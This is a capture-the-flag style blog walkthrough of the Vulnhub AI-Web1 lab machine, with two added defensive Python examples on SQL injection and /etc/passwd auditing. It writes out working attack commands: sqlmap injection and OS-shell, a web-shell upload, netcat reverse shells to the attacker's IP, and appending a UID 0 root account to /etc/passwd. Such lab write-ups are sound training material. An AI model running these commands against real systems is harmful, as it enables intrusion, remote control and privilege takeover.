Read this article and learn to play the Vulnhub penetration-testing target machine: AI-Web1

Vulnhub target machine introduction:

Vulnhub is a comprehensive practice range that provides a variety of vulnerable platforms. You can download many different vulnerable virtual machines, open them in a local hypervisor, and practise penetration testing, privilege escalation, vulnerability exploitation, code auditing and other hands-on skills, much like a game.

This is a web vulnerability target machine; as usual, the goal is to find the flag.

Vulnhub target machine download:

Official website address: https://www.vulnhub.com/entry/ai-web-1,353/

Vulnhub target machine installation:

After downloading, unzip the package and open the virtual machine in VMware.

Detailed walkthrough of the Vulnhub target machine vulnerabilities:

①: Information collection:

Use netdiscover in Kali to discover the target host. Kali IP: 192.168.0.103, target machine IP: 192.168.0.104

Use the command: nmap -sS -sV -A -n 192.168.0.104

Port 80 is open. Visit it first: the page only says that Google can't find its content. Go straight to the tool and scan for hidden directories: dirb http://192.168.0.104
robots.txt (the crawler exclusion file) was found. Visiting it reveals two directories, /m3diNf0/ and /se3reTdir777/uploads/; access them in turn.
Accessing the first path returns a 403 (forbidden), and accessing the second path is forbidden as well, so scan again with the command: dirb http://192.168.0.104/m3diNf0/
This reveals the absolute path of the website. Then use dirb again to scan the other path, /se3reTdir777/uploads/, and find an index.php.

②: SQL injection:

The page looks like it may be vulnerable to SQL injection. You can test it manually or with sqlmap. First check the number of columns with 1' order by 4#; if the page still echoes results, there is a SQL injection vulnerability.
I am lazy and like to use sqlmap. First capture the request with Burp Suite to see the injected parameters: uid=1&Operation=Submit


sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit"  --dbs # list databases


sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit"  -D aiweb1 --tables # list tables


sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit"  -D aiweb1 -T user --columns # list columns


sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit"  --level=3 --os-shell # spawn an OS shell

Select php (the default) and custom location(s), then enter the path obtained earlier: /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

This gives a shell, but only as the low-privilege www-data user.
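As an added illustration that is not code from this walkthrough, the following Python shows the bug class behind the uid parameter: the vulnerable handler pastes the input into the SQL text, the hardened one binds it as a parameter. It uses sqlite3 as a stand-in for the MySQL backend (so the comment marker is -- instead of #), and the four-column table layout is an assumption, since the real aiweb1 schema is not on the page.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the aiweb1 'user' table (real schema unknown)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER, firstName TEXT, lastName TEXT, password TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?, ?, ?)", [
        (1, "Alice", "Example", "constructed-hash-1"),
        (2, "Bob", "Example", "constructed-hash-2"),
    ])
    return conn


def lookup_vulnerable(conn, uid):
    # The bug class: the untrusted uid is concatenated into the SQL text,
    # so a quote inside it ends the literal and the rest is parsed as SQL.
    sql = f"SELECT * FROM user WHERE id = '{uid}'"
    return conn.execute(sql).fetchall()


def lookup_fixed(conn, uid):
    # Hardened form: uid is bound as a parameter and can never become SQL.
    return conn.execute("SELECT * FROM user WHERE id = ?", (uid,)).fetchall()


def probe(fn, conn, uid):
    """Run one lookup and report ('rows', count) or ('error', message)."""
    try:
        return ("rows", len(fn(conn, uid)))
    except sqlite3.Error as exc:
        return ("error", str(exc))


def column_count_probe(fn, conn, max_cols=8):
    """Replay the page's "order by N" check against a handler.

    On the vulnerable handler the largest N that still returns rows is the
    column count; the fixed handler treats the whole string as a literal id,
    returns no rows for any N, and so leaks nothing (result 0).
    """
    found = 0
    for n in range(1, max_cols + 1):
        kind, count = probe(fn, conn, f"1' order by {n} --")
        if kind == "rows" and count > 0:
            found = n
    return found
```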

③: File upload:

Now write a one-line PHP web shell (a "one-sentence Trojan") and use sqlmap to write it to the server path obtained above under a new name, hack.php.

sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit" --file-write ./hack.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/hack.php

--file-write: the local file to read (hack.php)

--file-dest: the absolute path on the target, including the name of the file to create there (hack.php)

Then visit http://192.168.0.104/se3reTdir777/uploads/hack.php. If the page is blank, the upload succeeded! Connect to it directly with the webshell tool AntSword.

④: Reverse shell:

1. First listen on a port in Kali with the command: nc -lvvp 6666
2. nc -e /bin/bash 192.168.0.103 6666 (it turns out the -e option is not available on the target)
3. Use the command: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.103 6666 >/tmp/f (this sends the shell back to Kali)
4. Use the command: python -c "import pty;pty.spawn('/bin/bash')" (use Python to get an interactive terminal)


⑤: Privilege escalation:

First use the command: find / -user root -perm -4000 -print 2>/dev/null to list the SUID binaries owned by root that can be executed.
Look at the kernel version with the command: uname -a. The current version is 4.15.0-58-generic.
Search for relevant kernel vulnerabilities with: searchsploit linux kernel 4.15.0-58-generic. No usable exploit is found.
The escalation method turns out to be the same as for DC-9: you can add a root account to /etc/passwd and log in with it to escalate privileges. See the following article:

Read this article and learn to play the Vulnhub penetration-testing target machine: DC-9

Use the command: openssl passwd -1 -salt hacker 123456 to generate the password hash for a new admin account, then append the account to /etc/passwd:

echo 'hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0::/root:/bin/bash' >> /etc/passwd


⑥: Get the flag:

At this point, the flag has been obtained, and the penetration test is over.

Vulnhub target machine penetration summary:

The new knowledge points here are sqlmap's --os-shell (the first time I have used it) and the format of /etc/passwd. If you don't understand the format, it is best to escalate privileges one step at a time, because it is easy to make mistakes. The fields are:
username:password:UID (user ID):GID (group ID):description:home directory:default shell
An "x" in the password field means the real hash is stored in /etc/shadow. In the shell field, /bin/bash allows login while /sbin/nologin prohibits shell login.
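As an added defender-side example (not part of the original post), this Python parses lines in the seven-field /etc/passwd layout described above and flags what the appended hacker entry from the privilege-escalation step introduces: a hash stored directly in the file instead of the "x" placeholder, and a second UID 0 account. The sample lines are constructed except for the hacker entry, which is the one shown on the page; the mode check covers the precondition (a file writable by non-root users) that the append depends on.

```python
import stat

# Constructed sample in the layout username:password:UID:GID:description:home:shell.
# The last line is the entry the walkthrough appends, copied from the page.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0::/root:/bin/bash
"""

# Values that mean "hash lives in /etc/shadow" or "account locked", not a real hash.
SHADOW_PLACEHOLDERS = {"x", "*", "!", "!!"}


def parse_passwd(text):
    """Split passwd-format text into dicts; lines without seven fields are flagged."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            entries.append({"line": lineno, "name": line, "malformed": True})
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({"line": lineno, "name": name, "pw": pw, "uid": uid,
                        "gid": gid, "home": home, "shell": shell, "malformed": False})
    return entries


def audit_passwd(text):
    """Return (line, name, reason) findings for the signs of this escalation."""
    findings = []
    for e in parse_passwd(text):
        if e["malformed"]:
            findings.append((e["line"], e["name"], "malformed entry"))
            continue
        if e["pw"] == "":
            findings.append((e["line"], e["name"], "empty password field"))
        elif e["pw"] not in SHADOW_PLACEHOLDERS:
            # A hash here bypasses /etc/shadow entirely, which is what the
            # openssl passwd -1 line in the walkthrough relies on.
            findings.append((e["line"], e["name"], "password hash stored in /etc/passwd"))
        if e["uid"] == "0" and e["name"] != "root":
            findings.append((e["line"], e["name"], "extra UID 0 account"))
    return findings


def is_group_or_world_writable(mode):
    """True if a file mode (e.g. os.stat(path).st_mode) lets non-owners write."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))
```

On a real host, run audit_passwd(open("/etc/passwd").read()) and is_group_or_world_writable(os.stat("/etc/passwd").st_mode); a clean system returns no findings and False.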

This time we studied a web target machine. I hope you have also picked up some new knowledge points and some penetration-testing ideas. Writing this up is not easy; I hope it is helpful to everyone!


Origin blog.csdn.net/Aluxian_/article/details/124434294